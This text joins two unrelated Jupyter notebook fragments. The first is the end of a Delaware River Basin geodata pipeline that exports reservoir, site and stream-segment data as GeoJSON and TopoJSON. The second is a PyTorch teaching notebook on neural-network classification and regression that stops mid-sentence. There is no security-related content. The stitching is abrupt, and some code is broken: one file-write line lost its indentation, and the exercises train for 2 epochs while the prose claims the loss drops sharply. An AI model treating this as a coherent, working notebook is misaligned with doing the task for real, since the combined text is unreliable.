# export geodataframe as a geojson
reservoirs.to_file(os.path.join(intermediate_output_dir,'reservoirs.json'), driver='GeoJSON')
```
##### Generate delaware bay geojson
```
delaware_bay_gdf.to_file(os.path.join(intermediate_output_dir,'NHDWaterbody_DelawareBay_pt6per_smooth.json'), driver='GeoJSON')
```
### Export processed datasets
##### locations of unique monitoring sites with temperature observations
```
# convert geodataframe to geojson
unique_drb_sites_gdf.to_file(os.path.join(intermediate_output_dir,'unique_drb_sites.json'), driver='GeoJSON')
```
##### count of observations at sites associated with each agency in each year
```
source_annual_count.to_csv(os.path.join(output_dir,'source_annual_count.csv'), index_label=None)
```
##### temporal counts of temperature observations (not segment-specific)
```
# export total counts for each year from 1980-2019
obs_annual_count.to_csv(os.path.join(output_dir,'obs_annual_count.csv'), index_label=None)
# export total counts for each day of 2019
obs_daily_count_2019.to_csv(os.path.join(output_dir,'obs_daily_count_2019.csv'), index_label=None)
```
##### matrix of segment temperature observations on annual timestep
```
matrix_annual_obs.to_csv(os.path.join(output_dir,'matrix_annual_obs.csv'), index_label=None)
```
##### matrix of segment temperature observations on daily timestep (2019 only)
```
matrix_daily_2019_obs.to_csv(os.path.join(output_dir,'matrix_daily_2019_obs.csv'), index_label=None)
```
##### mean annual modeled segment outflow for each model segment
```
# segment_maflow.to_csv('TP_output_data/segment_maflow.csv', index_label='seg_id_nat')
segment_maflow.to_csv(os.path.join(output_dir,'segment_maflow.csv'), index_label=None)
```
### Construct and export segment geojson
##### prep data
```
# convert segment geodataframe to dictionary format
segment_polylines = segment_gdf.to_dict(orient='records')
len(segment_polylines)
# get list of years in record (1980-2020)
year_list = np.unique(obs_temp_df['year'].tolist())
year_list.sort()
month_list = ['January','February','March','April','May','June','July','August','September','October','November','December']
```
##### construct json
```
# format designed to match desired structure of segmentDict
# create empty array to store dictionaries
segment_array = []
# iterate through the list of segments to...
i = 0
while i < len(segment_polylines):
    # create an empty segment dictionary
    segment_dict = {}
    # set type to Feature
    segment_dict["type"] = "Feature"
    # set segment id field
    segment_id = segment_polylines[i]['seg_id_nat']
    segment_dict["seg_id_nat"] = str(segment_id)
    # add properties dictionary
    segment_dict["properties"] = {}
    # add segment id as a property
    segment_dict["properties"]["seg_id_nat"] = str(segment_id)
    # add segment id as outer key
    segment_dict["properties"][str(segment_id)] = {}
    # add average annual flow
    segment_dict["properties"][str(segment_id)]['avg_ann_flow'] = str(segment_maflow['avg_ann_flow'][segment_id])
    # add total count of observations in each segment (0 if the segment has no observations)
    try:
        segment_dict["properties"][str(segment_id)]["total_count"] = str(obs_temp_count['total_count'][segment_id])
    except KeyError:
        segment_dict["properties"][str(segment_id)]["total_count"] = '0'
    # create dictionary to store count for each year on record
    segment_dict["properties"][str(segment_id)]["year_count"] = {}
    # iterate through years in list of years to...
    for year in year_list:
        # add the count of observations for each segment in that year (0 if none)
        try:
            segment_dict["properties"][str(segment_id)]["year_count"][str(year)] = str(obs_temp_year_count['obs_count'][segment_id][year])
        except KeyError:
            segment_dict["properties"][str(segment_id)]["year_count"][str(year)] = '0'
    # add dictionary to store monthly data from 2019 for each segment
    segment_dict["properties"][str(segment_id)]["data_2019_monthly"] = {}
    for month in month_list:
        try:
            # probe: raises KeyError if this segment has no observations in this month
            obs_temp_month_2019['obs_count'][segment_id][month]
            segment_dict["properties"][str(segment_id)]["data_2019_monthly"][month] = {}
            segment_dict["properties"][str(segment_id)]["data_2019_monthly"][month]["month_count"] = str(obs_temp_month_2019['obs_count'][segment_id][month])
            segment_dict["properties"][str(segment_id)]["data_2019_monthly"][month]["month_avg_temp"] = str(obs_temp_month_2019['mean_t_c'][segment_id][month])
        except KeyError:
            # skip months with no observations for this segment
            continue
    # add geometry based on segment geometry
    segment_dict["geometry"] = segment_polylines[i]["geometry"]
    # append the segment dictionary to the segment array
    segment_array.append(segment_dict)
    # print statement indicating progress
    print("added segment", str(i+1), "of", len(segment_polylines))
    # increase counter for loop
    i += 1
# create empty feature collection dictionary
segment_feature_collection = {}
segment_feature_collection["type"] = "FeatureCollection"
# set content of segment array as list of features within feature collection
segment_feature_collection["features"] = segment_array
# convert segment feature collection to json format
segment_geojson = geojson.dumps(segment_feature_collection)
# export formatted segment geojson
with open(os.path.join(intermediate_output_dir,'segment_data.json'), 'w', encoding='utf-8') as json_file:
json_file.write(segment_geojson)
```
# Convert exported geojsons to topojsons
##### Requires installation of mapshaper: https://github.com/mbloch/mapshaper
```
# get documentation
! mapshaper -h
# convert reservoir json in intermediate_output folder to topojson w/ reduced precision and save in topojson subfolder of public data folder
! mapshaper -i intermediate_output/reservoirs.json -o ../public/data/topojson/reservoirs.json format=topojson precision=0.001
# convert unique_drb_sites json in intermediate_output folder to topojson w/ reduced precision and save in topojson subfolder of public data folder
! mapshaper -i intermediate_output/unique_drb_sites.json -o ../public/data/topojson/unique_drb_sites.json format=topojson precision=0.001
# convert segment_geojson json in intermediate_output folder to topojson w/ reduced precision and save in topojson subfolder of public data folder
! mapshaper -i intermediate_output/segment_data.json -o ../public/data/topojson/segment_data.json format=topojson precision=0.0001
# convert NHDWaterbody_DelawareBay_pt6per_smooth.json in intermediate_output folder to topojson w/ reduced precision and save in topojson subfolder of public data folder
! mapshaper -i intermediate_output/NHDWaterbody_DelawareBay_pt6per_smooth.json -o ../public/data/topojson/DelawareBay.json format=topojson precision=0.001
```
ESTIMATED TOTAL MEMORY USAGE: 2700 MB (but peaks will hit ~20 GB)
```
%load_ext autoreload
%autoreload 2
%matplotlib inline
import torch
import torch.nn as nn
import torch.optim as optim
import matplotlib.pylab as plt
import pandas as pd
import numpy as np
from sklearn.neural_network import MLPClassifier, MLPRegressor
import copy
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(device)
```
# Goals of this notebook
We want to introduce the basics of neural networks and deep learning. Modern deep learning is a huge field and it's impossible to cover even all the significant developments in the last 5 years here. But the basics are straightforward.
One big caveat: deep learning is a rapidly evolving field. There are new developments in neural network architectures, novel applications, better optimization techniques, theoretical results justifying why something works etc. daily. It's a great opportunity to get involved if you find research interesting and there are great online communities (pytorch, fast.ai, paperswithcode, pysyft) that you should get involved with.
**Note**: Unlike the previous notebooks, this notebook has very few questions. You should study the code, tweak the data, the parameters, and poke the models to understand what's going on.
**Note**: You can install extensions (search for nbextensions) for Jupyter notebooks. I tend to use nbresuse to display memory usage in the top right corner, which really helps.
* To run a cell, press "Shift + Enter".
* To add a cell before your current cell, press "Esc + a".
* To add a cell after your current cell, press "Esc + b".
* To delete a cell, press "Esc + x".
* To be able to edit a cell, press "Enter".
* To see more documentation about a function, type ?function_name.
* To see source code, type ??function_name.
* To quickly see possible arguments for a function, press "Shift + Tab" after typing the function name.
Esc and Enter take you into different modes. Press "Esc + h" to see all shortcuts.
## Synthetic/Artificial Datasets
We covered the basics of neural networks in the lecture. We also saw applications to two synthetic datasets. The goal in this section is to replicate those results and get a feel for using pytorch.
### Classification
```
def generate_binary_data(N_examples=1000, seed=None):
    if seed is not None:
        np.random.seed(seed)
    features = []
    target = []
    for i in range(N_examples):
        #class = 0
        r = np.random.uniform()
        theta = np.random.uniform(0, 2*np.pi)
        features.append([r*np.cos(theta), r*np.sin(theta)])
        target.append(0)
        #class = 1
        r = 3 + np.random.uniform()
        theta = np.random.uniform(0, 2*np.pi)
        features.append([r*np.cos(theta), r*np.sin(theta)])
        target.append(1)
    features = np.array(features)
    target = np.array(target)
    return features, target
features, target = generate_binary_data(seed=100)
def plot_binary_data(features, target):
    plt.figure(figsize=(10,10))
    plt.plot(features[target==0][:,0], features[target==0][:,1], 'p', color='r', label='0')
    plt.plot(features[target==1][:,0], features[target==1][:,1], 'p', color='g', label='1')
    plt.xlabel('x')
    plt.ylabel('y')
    plt.legend()
plot_binary_data(features, target)
```
We have two features here - x and y. There is a binary target variable that we need to predict. This is essentially the dataset from the logistic regression discussion. Logistic regression will not do well here given that the data is not linearly separable. Transforming the data so we have two features:
$$r^2 = x^2 + y^2$$
and
$$\theta = \arctan(\frac{y}{x})$$
would make it very easy to use logistic regression (or just a cut at $r = 2$) to separate the two classes. While it is easy for us to visualize the data and guess at the transformation here, in high dimensions we can't follow the same process.
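As a quick sanity check of this claim, here is a standalone sketch (with freshly generated data mimicking the dataset above — the radii and class layout are assumptions, not the notebook's exact data): after mapping to the radial coordinate $r$, a plain logistic regression separates the classes perfectly.

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

rng = np.random.default_rng(0)
# class 0: points inside the unit disk; class 1: ring with 3 <= r < 4
r = np.concatenate([rng.uniform(0, 1, 500), rng.uniform(3, 4, 500)])
theta = rng.uniform(0, 2 * np.pi, 1000)
X = np.column_stack([r * np.cos(theta), r * np.sin(theta)])
y = np.concatenate([np.zeros(500), np.ones(500)])

# polar transform: a single feature r = sqrt(x^2 + y^2)
r_feat = np.sqrt(X[:, 0] ** 2 + X[:, 1] ** 2).reshape(-1, 1)
clf = LogisticRegression().fit(r_feat, y)
print(clf.score(r_feat, y))  # 1.0 - perfectly separable in r
```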
Let's implement a feed-forward neural network that takes the two features as input and predicts the probability of being in class 1 as output.
#### Architecture Definition
```
class ClassifierNet(nn.Module): #inherit from nn.Module to define your own architecture
    def __init__(self, N_inputs, N_outputs, N_hidden_layers, N_hidden_nodes, activation, output_activation):
        super(ClassifierNet, self).__init__()
        self.N_inputs = N_inputs #2 in our case
        self.N_outputs = N_outputs #1 in our case but can be higher for multi-class classification
        self.N_hidden_layers = N_hidden_layers #we'll start by using one hidden layer
        self.N_hidden_nodes = N_hidden_nodes #number of nodes in each hidden layer - can extend to passing a list
        #Define layers below - pytorch has a lot of layers pre-defined
        #use nn.ModuleList or nn.ModuleDict instead of [] or {} - more explanations below
        self.layer_list = nn.ModuleList([]) #use just as a python list
        for n in range(N_hidden_layers):
            if n == 0:
                self.layer_list.append(nn.Linear(N_inputs, N_hidden_nodes))
            else:
                self.layer_list.append(nn.Linear(N_hidden_nodes, N_hidden_nodes))
        self.output_layer = nn.Linear(N_hidden_nodes, N_outputs)
        self.activation = activation #activations at inner nodes
        self.output_activation = output_activation #activation at last layer (depends on your problem)
    def forward(self, inp):
        '''
        every neural net in pytorch has its own forward function
        this function defines how data flows through the architecture from input to output i.e. the forward propagation part
        '''
        out = inp
        for layer in self.layer_list:
            out = layer(out) #calls forward function for each layer (already implemented for us)
            out = self.activation(out) #non-linear activation
        #pass activations through last/output layer
        out = self.output_layer(out)
        if self.output_activation is not None:
            pred = self.output_activation(out)
        else:
            pred = out
        return pred
```
There are several ways of specifying a neural net architecture in pytorch. You can work at a high level of abstraction by just listing the layers that you want, or get into the fine details by constructing your own layers (as classes) that can be used in ClassifierNet above.
How does pytorch work? When you define an architecture like the one above, pytorch constructs a graph (nodes and edges) where the nodes are operations on multi-indexed arrays (called tensors).
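A minimal illustration of this graph-building (my own toy example, not from the notebook): pytorch records every operation on a tensor with `requires_grad=True`, and `backward()` walks the recorded graph to fill in gradients.

```python
import torch

# pytorch records the ops (pow, mul, add) into a graph as they execute
x = torch.tensor(3.0, requires_grad=True)
y = x ** 2 + 2 * x
y.backward()      # traverse the graph backwards to compute dy/dx = 2x + 2
print(x.grad)     # tensor(8.) at x = 3
```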
```
N_inputs = 2
N_outputs = 1
N_hidden_layers = 1
N_hidden_nodes = 2
activation = nn.Sigmoid()
output_activation = nn.Sigmoid() #we want one probability between 0-1
net = ClassifierNet(N_inputs,
N_outputs,
N_hidden_layers,
N_hidden_nodes,
activation,
output_activation)
```
#### Training
**Loss function**
We first need to pick our loss function. As with binary classification problems generally (including logistic regression), we'll use binary cross-entropy:
$$\text{Loss, } L = -\sum_{i=1}^{N} \big[ y_i \log(p_i) + (1-y_i) \log(1-p_i) \big]$$
where $y_i \in {0,1}$ are the labels and $p_i \in [0,1]$ are the probability predictions.
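As a quick sanity check of the formula (a single example with label $y = 1$, so the loss reduces to $-\log(p)$), we can compare a hand computation against `nn.BCELoss`:

```python
import torch
import torch.nn as nn

p = torch.tensor(0.3)   # predicted probability
y = torch.tensor(1.0)   # true label
manual = -(y * torch.log(p) + (1 - y) * torch.log(1 - p))
print(manual, nn.BCELoss()(p, y))  # both equal -log(0.3)
```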
```
#look at all available losses (you can always write your own)
#torch.nn.*Loss?
criterion = nn.BCELoss()
#get a feel for the loss function
#target = 1 (label = 1)
print(criterion(torch.tensor(1e-2), torch.tensor(1.))) #pred prob = 1e-2 -> BAD
print(criterion(torch.tensor(0.3), torch.tensor(1.))) #pred prob = 0.3 -> BAd
print(criterion(torch.tensor(0.5), torch.tensor(1.))) #pred prob = 0.5 -> Bad
print(criterion(torch.tensor(1.), torch.tensor(1.))) #pred prob = 1.0 -> GREAT!
```
**Optimizer**:
So we have the data, the neural net architecture, a loss function to measure how well the model does on our task. We also need a way to do gradient descent.
Recall, we use gradient descent to minimize the loss by computing the first derivative (gradients) and taking a step in the direction opposite (since we are minimizing) to the gradient:
$$w_{t+1} = w_{t} - \eta \frac{\partial L}{\partial w_{t}}$$
where $w_t$ = weight at time-step t, $L$ = loss, $\eta$ = learning rate.
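Before handing the update over to an optimizer, it helps to see the rule done by hand on a toy one-weight loss (my own example — the loss and values are made up):

```python
import torch

w = torch.tensor(2.0, requires_grad=True)
eta = 0.1
loss = (w - 1.0) ** 2    # toy loss with minimum at w = 1
loss.backward()          # dL/dw = 2(w - 1) = 2 at w = 2
with torch.no_grad():    # the update itself should not be tracked
    w -= eta * w.grad    # w -> 2 - 0.1 * 2 = 1.8
print(w)
```

`optimizer.step()` does exactly this loop over every registered parameter (with Adam's extra bookkeeping on top).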
For our neural network, we first need to calculate the gradients. Thankfully, this is done automatically by pytorch using a procedure called **backpropagation**. If you are interested in the detailed calculations, please check "automatic differentiation" and an analytical calculation for a feed-forward network (https://treeinrandomforest.github.io/deep-learning/2018/10/30/backpropagation.html).
The gradients are calculated by calling **backward** on the loss tensor, as we'll see below.
Once the gradients are calculated, we need to update the weights. In practice, there are many heuristics/variants of the update step above that lead to better optimization behavior. A great resource to dive into details is https://ruder.io/optimizing-gradient-descent/. We won't get into the details here.
We'll choose what's called the **Adam** optimizer.
```
#optim.*?
optimizer = optim.Adam(net.parameters(), lr=1e-2)
```
We picked a constant learning rate here (which is adjusted internally by Adam) and also passed all the tunable weights in the network by using: net.parameters()
```
list(net.parameters())
```
There are 9 free parameters:
* A 2x2 matrix (4 parameters) mapping the input layer to the 1 hidden layer.
* A 2x1 matrix (2 parameters) mapping the hidden layer to the output layer with one node.
* 2 biases for the 2 nodes in the hidden layer.
* 1 bias for the output node in the output layer.
This is a good place to explain why we need to use nn.ModuleList. If we had just used a vanilla python list, net.parameters() would only show weights that are explicitly defined in our net architecture. The weights and biases associated with the layers would NOT show up in net.parameters(). This process of a module higher up in the hierarchy (ClassifierNet) subsuming the weights and biases of modules lower in the hierarchy (layers) is called **registering**. ModuleList ensures that all the weights/biases are registered as weights and biases of ClassifierNet.
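A tiny demonstration of registering (my own toy example): the same layer held in a plain python list is invisible to `.parameters()`, while `nn.ModuleList` makes it show up.

```python
import torch.nn as nn

class PlainList(nn.Module):
    def __init__(self):
        super().__init__()
        self.layers = [nn.Linear(2, 2)]                 # NOT registered

class Registered(nn.Module):
    def __init__(self):
        super().__init__()
        self.layers = nn.ModuleList([nn.Linear(2, 2)])  # registered

print(len(list(PlainList().parameters())))   # 0 - optimizer would see nothing
print(len(list(Registered().parameters())))  # 2 - weight matrix + bias vector
```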
Let's combine all these elements and train our first neural net.
```
#convert features and target to torch tensors
features = torch.from_numpy(features)
target = torch.from_numpy(target)
#if have gpu, throw the model, features and labels on it
net = net.to(device)
features = features.to(device).float()
target = target.to(device).float()
```
We need to do the following steps now:
* Compute the gradients for our dataset.
* Do gradient descent and update the weights.
* Repeat till ??
The problem is there's no way of knowing when we have converged or are close to the minimum of the loss function. In practice, this means we keep repeating the process above and monitor the loss as well as performance on a hold-out set. When we start over-fitting on the training set, we stop. There are various modifications to this procedure but this is the essence of what we are doing.
Each pass through the whole dataset is called an **epoch**.
```
N_epochs = 100
for epoch in range(N_epochs):
    out = net(features).reshape(-1) #make predictions; flatten (N, 1) output to (N,) to match target
    loss = criterion(out, target) #compute loss on our predictions
    optimizer.zero_grad() #set all gradients to 0
    loss.backward() #backprop to compute gradients
    optimizer.step() #update the weights
    if epoch % 10 == 0:
        print(f'Loss = {loss:.4f}')
```
Let's combine all these elements into a function.
```
def train_model(features, target, model, lr, N_epochs, criterion=nn.BCELoss(), shuffle=False):
    optimizer = torch.optim.Adam(model.parameters(), lr=lr) #Adam optimizer
    #if have gpu, throw the model, features and labels on it
    model = model.to(device)
    features = features.to(device)
    target = target.to(device)
    for epoch in range(N_epochs):
        if shuffle: #should have no effect on gradients in this case
            indices = torch.randperm(len(features))
            features_shuffled = features[indices]
            target_shuffled = target[indices]
        else:
            features_shuffled = features
            target_shuffled = target
        out = model(features_shuffled)
        loss = criterion(out, target_shuffled.reshape(out.shape)) #reshape target to match the (N, 1) output
        if epoch % 1000 == 0:
            print(f'epoch = {epoch} loss = {loss}')
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
    pred = model(features_shuffled).detach().reshape(len(target))
    pred[pred > 0.5] = 1
    pred[pred <= 0.5] = 0
    #print(f'Accuracy = {accuracy}')
    model = model.to('cpu')
    features = features.to('cpu')
    target = target.to('cpu')
    return model
```
**Exercise**: Train the model and vary the number of hidden nodes and see what happens to the loss. Can you explain this behavior?
```
N_inputs = 2
N_outputs = 1
N_hidden_layers = 1
N_hidden_nodes = 1 #<--- play with this
activation = nn.Sigmoid()
output_activation = nn.Sigmoid() #we want one probability between 0-1
net = ClassifierNet(N_inputs,
N_outputs,
N_hidden_layers,
N_hidden_nodes,
activation,
output_activation)
net = train_model(features, target, net, 1e-3, 2)
N_inputs = 2
N_outputs = 1
N_hidden_layers = 1
N_hidden_nodes = 2 #<--- play with this
activation = nn.Sigmoid()
output_activation = nn.Sigmoid() #we want one probability between 0-1
net = ClassifierNet(N_inputs,
N_outputs,
N_hidden_layers,
N_hidden_nodes,
activation,
output_activation)
net = train_model(features, target, net, 1e-3, 2)
N_inputs = 2
N_outputs = 1
N_hidden_layers = 1
N_hidden_nodes = 3 #<--- play with this
activation = nn.Sigmoid()
output_activation = nn.Sigmoid() #we want one probability between 0-1
net = ClassifierNet(N_inputs,
N_outputs,
N_hidden_layers,
N_hidden_nodes,
activation,
output_activation)
net = train_model(features, target, net, 1e-3, 2)
```
There seems to be some "magic" behavior when we increase the number of nodes in the first (and only) hidden layer from 2 to 3. Loss suddenly goes down dramatically. At this stage, we should explore why that's happening.
For every node in the hidden layer, we have a mapping from the input to that node:
$$\sigma(w_1 x + w_2 y + b)$$
where $w_1, w_2, b$ are specific to that hidden node. We can plot the decision line in this case:
$$w_1 x + w_2 y + b = 0$$
Unlike logistic regression, this is not actually a decision line. Points on one side are not classified as 0 and points on the other side as 1 (if the threshold = 0.5). Instead this line should be thought of as one defining a new coordinate system. Instead of x and y coordinates, every hidden node induces a straight line and a new coordinate, say $\alpha_i$. So if we have 3 hidden nodes, we are mapping the 2-dimensional input space into a 3-dimensional space, where the coordinates $\alpha_1, \alpha_2, \alpha_3$ of each point depend on which side of the 3 induced lines the point lies.
```
params = list(net.parameters())
print(params[0]) #3x2 matrix
print(params[1]) #3 biases
features = features.detach().cpu().numpy() #detach from pytorch computational graph, bring back to cpu, convert to numpy
target = target.detach().cpu().numpy()
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot()
#plot raw data
ax.plot(features[target==0][:,0], features[target==0][:,1], 'p', color='r', label='0')
ax.plot(features[target==1][:,0], features[target==1][:,1], 'p', color='g', label='1')
plt.xlabel('x')
plt.ylabel('y')
#get weights and biases
weights = params[0].detach().numpy()
biases = params[1].detach().numpy()
#plot straight lines
x_min, x_max = features[:,0].min(), features[:,0].max()
y_lim_min, y_lim_max = features[:,1].min(), features[:,1].max()
for i in range(weights.shape[0]): #loop over each hidden node in the one hidden layer
    coef = weights[i]
    intercept = biases[i]
    y_min = (-intercept - coef[0]*x_min)/coef[1]
    y_max = (-intercept - coef[0]*x_max)/coef[1]
    ax.plot([x_min, x_max], [y_min, y_max])
ax.set_xlim(x_min, x_max)
ax.set_ylim(y_lim_min, y_lim_max)
ax.legend(framealpha=0)
```
This is the plot we showed in the lecture. For every hidden node in the hidden layer, we have a straight line. The colors of the three lines above are orange, green and blue and that's what we'll call our new coordinates.
Suppose you pick a point in the red region:
* It lies to the *right* of the orange line
* It lies to the *bottom* of the green line
* It lies to the *top* of the blue line.
(These directions might change because of inherent randomness during training - weight initializations here).
On the other hand, we have **6** green regions. If you start walking clockwise from the top green section, every time you cross a straight line, you walk into a new region. Each time you walk into a new region, you flip the coordinate of one of the 3 lines. Either you go from *right* to *left* of the orange line, *bottom* to *top* of the green line or *top* to *bottom* of the blue line.
So instead of describing each point by two coordinates (x, y), we can describe it by (orange status, green status, blue status). We happen to have 7 such regions here - with 1 being purely occupied by the red points and the other 6 by green points.
This might become clearer with a 3-dimensional plot.
```
from mpl_toolkits.mplot3d import Axes3D
#get hidden layer activations for all inputs
features_layer1_3d = net.activation(net.layer_list[0](torch.tensor(features))).detach().numpy()
print(features_layer1_3d[0:10])
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(projection='3d')
ax.plot(features_layer1_3d[target==0][:,0], features_layer1_3d[target==0][:,1], features_layer1_3d[target==0][:,2], 'p', color ='r', label='0')
ax.plot(features_layer1_3d[target==1][:,0], features_layer1_3d[target==1][:,1], features_layer1_3d[target==1][:,2], 'p', color ='g', label='1')
ax.legend(framealpha=0)
```
At this stage, a simple linear classifier can draw a linear decision boundary (a plane) to separate the red points from the green points. Also, these points lie in the unit cube (cube with sides of length=1) since we are using sigmoid activations. Whenever the activations get saturated (close to 0 or 1), then we see points on the edges and corners of the cube.
**Question**: Switch the activation from sigmoid to relu (nn.ReLU()). Does the loss still essentially become zero on the train set? If not, try increasing N_hidden_nodes. At what point does the loss actually become close to 0?
```
N_inputs = 2
N_outputs = 1
N_hidden_layers = 1
N_hidden_nodes = 5 #<---- play with this
activation = nn.ReLU()
output_activation = nn.Sigmoid() #we want one probability between 0-1
net = ClassifierNet(N_inputs,
N_outputs,
N_hidden_layers,
N_hidden_nodes,
activation,
output_activation)
features = torch.tensor(features)
target = torch.tensor(target)
net = train_model(features, target, net, 1e-3, 2)
```
**Question**: Remake the 3d plot but by trying 3 coordinates out of the N_hidden_nodes coordinates you found above?
```
features = features.detach().cpu().numpy() #detach from pytorch computational graph, bring back to cpu, convert to numpy
target = target.detach().cpu().numpy()
#get hidden layer activations for all inputs
features_layer1_3d = net.activation(net.layer_list[0](torch.tensor(features))).detach().numpy()
print(features_layer1_3d[0:10])
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(projection='3d')
COORD1 = 0
COORD2 = 1
COORD3 = 2
ax.plot(features_layer1_3d[target==0][:,COORD1], features_layer1_3d[target==0][:,COORD2], features_layer1_3d[target==0][:,COORD3], 'p', color ='r', label='0')
ax.plot(features_layer1_3d[target==1][:,COORD1], features_layer1_3d[target==1][:,COORD2], features_layer1_3d[target==1][:,COORD3], 'p', color ='g', label='1')
ax.legend(framealpha=0)
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(projection='3d')
COORD1 = 0
COORD2 = 1
COORD3 = 3
ax.plot(features_layer1_3d[target==0][:,COORD1], features_layer1_3d[target==0][:,COORD2], features_layer1_3d[target==0][:,COORD3], 'p', color ='r', label='0')
ax.plot(features_layer1_3d[target==1][:,COORD1], features_layer1_3d[target==1][:,COORD2], features_layer1_3d[target==1][:,COORD3], 'p', color ='g', label='1')
ax.legend(framealpha=0)
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(projection='3d')
COORD1 = 0
COORD2 = 2
COORD3 = 3
ax.plot(features_layer1_3d[target==0][:,COORD1], features_layer1_3d[target==0][:,COORD2], features_layer1_3d[target==0][:,COORD3], 'p', color ='r', label='0')
ax.plot(features_layer1_3d[target==1][:,COORD1], features_layer1_3d[target==1][:,COORD2], features_layer1_3d[target==1][:,COORD3], 'p', color ='g', label='1')
ax.legend(framealpha=0)
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(projection='3d')
COORD1 = 1
COORD2 = 2
COORD3 = 3
ax.plot(features_layer1_3d[target==0][:,COORD1], features_layer1_3d[target==0][:,COORD2], features_layer1_3d[target==0][:,COORD3], 'p', color ='r', label='0')
ax.plot(features_layer1_3d[target==1][:,COORD1], features_layer1_3d[target==1][:,COORD2], features_layer1_3d[target==1][:,COORD3], 'p', color ='g', label='1')
ax.legend(framealpha=0)
```
Draw all the plots
```
import itertools
for comb in itertools.combinations(np.arange(N_hidden_nodes), 3):
    fig = plt.figure(figsize=(10,10))
    ax = fig.add_subplot(projection='3d')
    COORD1, COORD2, COORD3 = comb
    ax.plot(features_layer1_3d[target==0][:,COORD1], features_layer1_3d[target==0][:,COORD2], features_layer1_3d[target==0][:,COORD3], 'p', color='r', label='0')
    ax.plot(features_layer1_3d[target==1][:,COORD1], features_layer1_3d[target==1][:,COORD2], features_layer1_3d[target==1][:,COORD3], 'p', color='g', label='1')
    ax.legend(framealpha=0)
    plt.title(f'COORDINATES = {comb}')
```
**Note**: Generally it is a good idea to use a linear layer for the output layer and use BCEWithLogitsLoss to avoid numerical instabilities. We will do this later for multi-class classification.
Clear variables
```
features = None
features_layer1_3d = None
target = None
net = None
```
### Regression
```
def generate_regression_data(L=10, stepsize=0.1):
    x = np.arange(-L, L, stepsize)
    y = np.sin(3*x) * np.exp(-x / 8.)
    return x, y

def plot_regression_data(x, y):
    plt.figure(figsize=(10,10))
    plt.plot(x, y)
    plt.xlabel('x')
    plt.ylabel('y')
x, y = generate_regression_data()
plot_regression_data(x, y)
```
This is a pretty different problem in some ways. We now have one input - x and one output - y. But looked at another way, we simply change the number of inputs in our neural network to 1 and we change the output activation to be a linear function. Why linear? Because in principle, the output (y) can be unbounded i.e. any real value.
We also need to change the loss function. While binary cross-entropy is appropriate for a classification problem, we need something else for a regression problem. We'll use mean-squared error:
$$\frac{1}{2}(y_{\text{target}} - y_{\text{pred}})^2$$
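One detail worth checking against the formula above: pytorch's `nn.MSELoss` averages $(y_{\text{target}} - y_{\text{pred}})^2$ over examples and omits the $\frac{1}{2}$ factor (which only rescales gradients and doesn't change the minimizer). A quick hand comparison:

```python
import torch
import torch.nn as nn

y_target = torch.tensor([1.0, 2.0, 3.0])
y_pred = torch.tensor([1.5, 2.0, 2.0])
manual = ((y_target - y_pred) ** 2).mean()  # (0.25 + 0 + 1) / 3
print(manual, nn.MSELoss()(y_pred, y_target))  # identical values
```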
Try modifying N_hidden_nodes from 1 through 10 and see what happens to the loss
```
N_inputs = 1
N_outputs = 1
N_hidden_layers = 1
N_hidden_nodes = 10 #<--- play with this
activation = nn.Sigmoid()
output_activation = None #linear output - regression targets can be any real value
net = ClassifierNet(N_inputs,
N_outputs,
N_hidden_layers,
N_hidden_nodes,
activation,
output_activation)
features = torch.tensor(x).float().reshape(len(x), 1)
target = torch.tensor(y).float().reshape(len(y), 1)
net = train_model(features, target, net, 1e-2, 2, criterion=nn.MSELoss())
pred = net(features).cpu().detach().numpy().reshape(len(features))
plt.plot(x, y)
plt.plot(x, pred)
```
As before, we need to understand what the model is doing. Let's consider the mapping from the input node to one node of the hidden layer. In this case, we have the mapping:
$$\sigma(w_i x + b_i)$$
where $w_i, b_i$ are the weight and bias associated with each node of the hidden layer. This defines a "decision" boundary where:
$$w_i x + b_i = 0$$
This is just a value $\delta_{i} \equiv -\frac{b_i}{w_i}$.
For each hidden node $i$, we can calculate one such threshold, $\delta_i$.
As we walk along the x-axis from the left to right, we will cross each threshold one by one. On crossing each threshold, one hidden node switches i.e. goes from $0 \rightarrow 1$ or $1 \rightarrow 0$. What effect does this have on the output or prediction?
Since the last layer is linear, its output is:
$y = v_1 h_1 + v_2 h_2 + \ldots + v_n h_n + c$
where $v_i$ are the weights from the hidden layer to the output node, $c$ is the bias on the output node, and $h_i$ are the activations on the hidden nodes. These activations can smoothly vary between 0 and 1 according to the sigmoid function.
So, when we cross a threshold, one of the $h_k$ values either turns off or turns on. This has the effect of adding or subtracting the constant $v_k$ from the output when the kth hidden node, $h_k$, switches on/off.
This means that as we add more hidden nodes, we can divide the domain (the x values) into more fine-grained intervals that can be assigned a single value by the neural network. In practice, there is a smooth interpolation.
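A tiny numerical illustration of the thresholds $\delta_i = -b_i / w_i$ (the weights and biases here are made up, not from the trained net):

```python
import numpy as np

# hypothetical hidden-layer weights and biases for a 1-input network
w = np.array([1.5, -0.8, 2.0])
b = np.array([3.0, 0.4, -1.0])
delta = -b / w          # x values where w_i * x + b_i = 0
print(np.sort(delta))   # walking left to right, each crossing flips one hidden node
```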
**Question**: Suppose instead of the sigmoid activations, we used a binary threshold:
$$\sigma(x) = \begin{cases}
1 & x > 0 \\
0 & x \leq 0
\end{cases}$$
then we would get a piece-wise constant prediction from our trained network. Plot that piecewise function as a function of $x$.
```
activations = net.activation(net.layer_list[0](features))
print(activations[0:10])
binary_activations = nn.Threshold(0.5, 0)(activations)/activations
print(binary_activations[0:10])
binary_pred = net.output_layer(binary_activations)
plt.figure(figsize=(10,10))
plt.plot(x,y, label='data')
plt.plot(x, binary_pred.cpu().detach().numpy(), label='binary')
plt.plot(x, pred, color='r', label='pred')
plt.legend()
```
**Question**: Why does the left part of the function fit so well but the right side is always compromised? Hint: think of the loss function.
The most likely reason is that the loss function is sensitive to the scale of the $y$ values. A 10% deviation between the y-value and the prediction near x = -10 contributes a larger absolute error than a 10% deviation near, say, x = 5.
**Question**: Can you think of ways to test this hypothesis?
There are a couple of things you could do. One is to flip the function from left to right and re-train the model. In this case, the right side should start fitting better.
Another option is to change the loss function to percentage error i.e.:
